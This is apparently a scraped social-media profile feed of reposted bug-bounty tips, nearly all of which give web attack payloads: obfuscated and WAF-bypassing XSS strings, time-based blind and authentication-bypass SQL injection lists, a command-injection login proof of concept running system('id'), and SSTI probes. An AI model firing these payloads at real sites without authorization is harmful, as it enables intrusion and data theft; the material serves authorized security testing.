vivekbug's profile picture.

Vivek

@vivekbug

Vivek reposted

XSS Payload Written in Russian 🇷🇺 а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а], з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")() Follow For More 🖤 #CyberSecurity #BugBounty #Hacking #EthicalHacking #XSS

Yass1nMohamed's tweet image. XSS Payload Written in Russian 🇷🇺

а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()

Follow For More 🖤

#CyberSecurity #BugBounty #Hacking #EthicalHacking #XSS

Vivek reposted

Same payload, 3 different browsers: #Chrome, #Edge, #Firefox. So don’t just test using your default browser, make sure to test on every browser you have 😉 Payload: `%3cimg%2fsrc%2fonerror%3dalert%2f%2f%26NewLine%3b(2)%3e` #BugBounty

nav1n0x's tweet image. Same payload, 3 different browsers: #Chrome, #Edge, #Firefox. So don’t just test using your default browser, make sure to test on every browser you have 😉
Payload: `%3cimg%2fsrc%2fonerror%3dalert%2f%2f%26NewLine%3b(2)%3e` #BugBounty

Vivek reposted

Simple test for SQL Injection on Web App , Common Injection Point's 1 URL Parameters 2 Form Inputs 3 HTTP Headers 4 Cookies 5 Hidden Fields 6 API Requests 7 Search Boxes Tested Payloads are ' AND '+OR+SLEEP(5)--+

firfox20's tweet image. Simple test for SQL Injection on Web App , 
Common Injection Point's 
1  URL Parameters
2  Form Inputs
3  HTTP Headers
4  Cookies
5 Hidden Fields
6 API Requests
7 Search Boxes
Tested Payloads are  ' AND '+OR+SLEEP(5)--+
firfox20's tweet image. Simple test for SQL Injection on Web App , 
Common Injection Point's 
1  URL Parameters
2  Form Inputs
3  HTTP Headers
4  Cookies
5 Hidden Fields
6 API Requests
7 Search Boxes
Tested Payloads are  ' AND '+OR+SLEEP(5)--+
firfox20's tweet image. Simple test for SQL Injection on Web App , 
Common Injection Point's 
1  URL Parameters
2  Form Inputs
3  HTTP Headers
4  Cookies
5 Hidden Fields
6 API Requests
7 Search Boxes
Tested Payloads are  ' AND '+OR+SLEEP(5)--+

Vivek reposted

🔥RCE in Auth Login ☠ ✨POC - "auth": ( "user";"darkshadow' system("id").**, "password" ="darkshadow" #bugbounty #bugbountytips #infosec #hacking #hacker

viehgroup's tweet image. 🔥RCE in Auth Login ☠

✨POC -
"auth": (
"user";"darkshadow' system("id").**,
"password" ="darkshadow"

#bugbounty #bugbountytips #infosec #hacking #hacker

Vivek reposted

SQL Injection Payload i was able to locate a SQL injection very hard to exploit , with digging I successfully got it with the sleep payload ''||(select 1 from (select pg_sleep(6))x)||' ==> i added as well to my SQL wordlist happy hunting ♥ #bugbountytips #bugbountytip

GodfatherOrwa's tweet image. SQL Injection Payload 

i was able to locate a SQL injection very hard to exploit , with digging I successfully got it with the sleep payload

''||(select 1 from (select pg_sleep(6))x)||'

==> i added as well to my SQL wordlist 

happy hunting ♥
#bugbountytips #bugbountytip…

Vivek reposted

Found an SQLi using sysdate() based blind SQLi payload: 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #SqlInjection #SQLi #bugbountytips #BugBounty

nav1n0x's tweet image. Found an SQLi using sysdate() based blind SQLi payload: 

0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

#SqlInjection #SQLi #bugbountytips  #BugBounty

Vivek reposted

Findsomething extension it’s give more than amazing results just in 1 press Keep it running and I assure you , it will save a lot of work for you / find some sensitive keys so quick chromewebstore.google.com/detail/findsom… #bugbounty #bugbountytip #bugbountytips


Vivek reposted

Bro just showed delay and got €3500 🫡 ‘XOR(if(now()=sysdate(),sleep(10),0))XOR’Z

n4itr0_07's tweet image. Bro just showed delay and got €3500 🫡

‘XOR(if(now()=sysdate(),sleep(10),0))XOR’Z

Vivek reposted

Now SQL Injection - another Bypass Auth Payloads #bugbountytips #bugbountytip " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or 1=1-- or true-- " or true-- ' or true-- ")or true-- ') or true-- ' or 'x'='x ) or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x


Vivek reposted

CloudFlare XSS Bypass : "><P/onpointerenter=alert(1)>

GBN_511's tweet image. CloudFlare XSS Bypass :

&quot;&amp;gt;&amp;lt;P/onpointerenter=alert(1)&amp;gt;

Vivek reposted

A mini-thread on how I approached this "Stored XSS with CSP Bypass" together with @confievil and popped it on our second day of hunting on that target (1/x): 👇 #bugbounty

shreyas_chavhan's tweet image. A mini-thread on how I approached this &quot;Stored XSS with CSP Bypass&quot; together with @confievil  and popped it on our second day of hunting on that target (1/x): 👇

#bugbounty

Vivek reposted

Is your open URL redirect payload getting blocked? 🧐 Try one of these payloads to bypass it! 🤑

intigriti's tweet image. Is your open URL redirect payload getting blocked? 🧐

Try one of these payloads to bypass it! 🤑

Vivek reposted

I earned $5,000 with @XHackerx007 for submission on @bugcrowd #ItTakesACrowd For 0Day SQLI in (app extension) payload was (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ #bugbountytips #extension_Injection✌️


Vivek reposted

Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' /?q=") /?q=') /?q=-x() #info #BugBountyTips #SQLinjection

0x0SojalSec's tweet image. Bug Bounty Tips
This is how to find sql-Injection 100% of the time
/?q=1
/?q=1&apos;
/?q=1&quot;
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*&apos;*/
/?q=1/*!1111&apos;*/
/?q=1&apos;||&apos;asd&apos;||&apos;   &amp;lt;== concat string
/?q=1&apos; or &apos;1&apos;=&apos;1
/?q=1 or 1=1
/?q=&apos;or&apos;&apos;=&apos;
/?q=&quot;)
/?q=&apos;)
/?q=-x()
#info #BugBountyTips #SQLinjection

Vivek reposted

Recently I found it .CSV file through urlscan.io contains user registration details how I discovered here I mentioned all details linkedin.com/posts/ajay-sol… #BugBounty #bugbountytip #CYBER #infosec #Pentesting

iamxroot's tweet image. Recently I found it .CSV file through urlscan.io contains user registration details how I discovered here I mentioned all details linkedin.com/posts/ajay-sol…

#BugBounty #bugbountytip #CYBER #infosec #Pentesting

Vivek reposted

Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎) github.com/h4x0r-dz/Leake…#bugbountytips #bugbounty #infosec #hacker #hacking

viehgroup's tweet image. Find Leaked Credentials Using Google Chrome dev  Tools (The Best Way 😎)

github.com/h4x0r-dz/Leake…… 

#bugbountytips #bugbounty #infosec #hacker #hacking

Vivek reposted

=> Insert a payload in the email field: `test+${{7*7}}@example.com` => Check the response: If you receive an email with `[email protected]`, => it confirms the presence of SSTI. #bugbounty #bugbountytips #cybersecuritytips

Ahmed78752911's tweet image. =&amp;gt; Insert a payload in the email field: `test+${{7*7}}@example.com`

=&amp;gt; Check the response:
If you receive an email with `test+49@example.com`, 

=&amp;gt; it confirms the presence of SSTI.
#bugbounty #bugbountytips #cybersecuritytips

United States Trends

Loading...

Something went wrong.


Something went wrong.